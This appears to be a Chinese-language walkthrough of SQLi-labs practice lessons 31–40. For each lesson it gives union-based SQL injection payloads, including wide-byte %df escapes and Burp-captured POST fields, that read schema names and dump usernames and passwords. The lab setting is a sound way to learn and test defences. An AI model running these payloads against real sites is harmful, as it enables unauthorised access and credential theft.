Less-31
1、判断注入点
输入?id=1\,页面显示:
可以得出注入点为")
2、查询回显点
输入?id=1&&id=0") union select 1,2,3 --+
得出回显点为2,3
3、查询数据库名
输入 ?id=1&&id=0") union select 1,database(),3 --+
4、查询数据库中的表
?id=1&&id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
5、查询users表中的列
?id=1&&id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
6、查询users所有字段
?id=1&&id=0") union select 1,group_concat(username,password),3 from users --+
Less-32
1、判断闭合方式
输入?id=1' 页面显示:
判断闭合方式为%df'
2、查询回显点
输入?id=-1%df' union select 1,2,3 --+
得出回显点为2,3
3、查询数据库名
输入?id=-1%df' union select 1,database(),3 --+
4、查询数据库中的表
输入?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
5、查询users表中的列
输入 ?id=1%df'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
6、查询users表中所有信息
?id=-1%df' unionselect 1,group_concat(username,password),3 from users--+
Less-33
1、判断闭合方式
输入?id=1' 页面显示:
当输入?id=1%df' --+时,成功闭合
2、判断回显点
输入?id=-1%df' union select 1,2,3 --+
3、查询数据库名
输入?id=-1%df' union select 1,database(),3 --+
4、查询数据库中的表
输入?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
5、查询users表中所有列
输入?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
6、查询users表中所有字段
输入?id=-1%df' union select 1,group_concat(username,password),3 from users --+
Less-34
1、使用burp suite进行抓包,并发送到repeater
2、查询数据库名
输入uname=-1%df'union select 1,database() #
3、查询数据库中的表
输入uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
4、查询users表中的列
输入uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
5、查询users表中所有字段
uname=-1%df' union select 1,group_concat(username,password) from users #
Less-35
1、判断闭合方式
输入?id=1 --+ 页面回显正确
2、判断回显点
输入?id=-1 union select 1,2,3 --+
确认回显点为2,3
3、查询数据库名
输入?id=-1 union select 1,database(),3 --+
4、查询数据库中的表
输入?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
5、查询users表中的列
输入?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
6、查询users表中所有字段
输入?id=-1 union select 1,group_concat(username,password),3 from users --+
Less-36
1、判断闭合方式
输入?id=1%df' --+ 闭合成功
2、判断回显点
输入?id=-1%df' union select 1,2,3 --+
确认回显点为2,3
3、查询数据库
输入 ?id=-1%df' union select 1,database(),3 --+
4、查询数据库中的表名
输入?id=-1%df'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
5、查询users表中的列
输入?id=-1%df'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
6、查询users表中所有字段
输入?id=-1%df'union select 1,group_concat(username,password),3 from users --+
Less-37
1、使用burp suite进行抓包,并发送至repeater
2、判断回显点
输入uname=-1%df' union select 1,2 #
3、查看数据库
输入uname=-1%df'union select 1,database() #
4、查看数据库中的表名
输入uname=-1%df'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
5、查看users表中的列
输入uname=-1%df'union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 #
6、查看users表中所有字段
输入uname=-1%df'union select 1,group_concat(username,password) from users #
Less-38
1、判断闭合方式
输入?id=1' --+ 闭合成功
2、判断注入点
输入?id=-1' union select 1,2,3 --+
注入点为2,3
3、查询数据库
输入?id=-1' union select 1,database(),3--+
4、查询数据库中的表名
输入?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
5、查询users表中的列
输入?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
6、查询users表中所有数据
输入?id=-1' union select 1,group_concat(username,password),3 from users --+
Less-39
1、判断闭合方式
输入?id=1 --+
2、判断注入点
输入?id=-1 union select 1,2,3 --+
注入点为2,3
3、查询数据库
输入?id=-1 union select 1,2,database() --+
4、查询数据库中的表
输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
5、查询users表中的列
输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
6、查询users表中所有字段
输入?id=-1 union select 1,2,group_concat(username,password) from users--+
Less-40
1、判断闭合方式
输入?id=1') --+
2、判断注入点
输入?id=-1') union select 1,2,3 --+
3、查询数据库
输入?id=-1') union select 1,2,database() --+
4、查询数据库中的表名
输入?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
5、查询users表中的列
输入?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
6、查询users表中所有字段
输入?id=-1') union select 1,2,group_concat(username,password) from users--+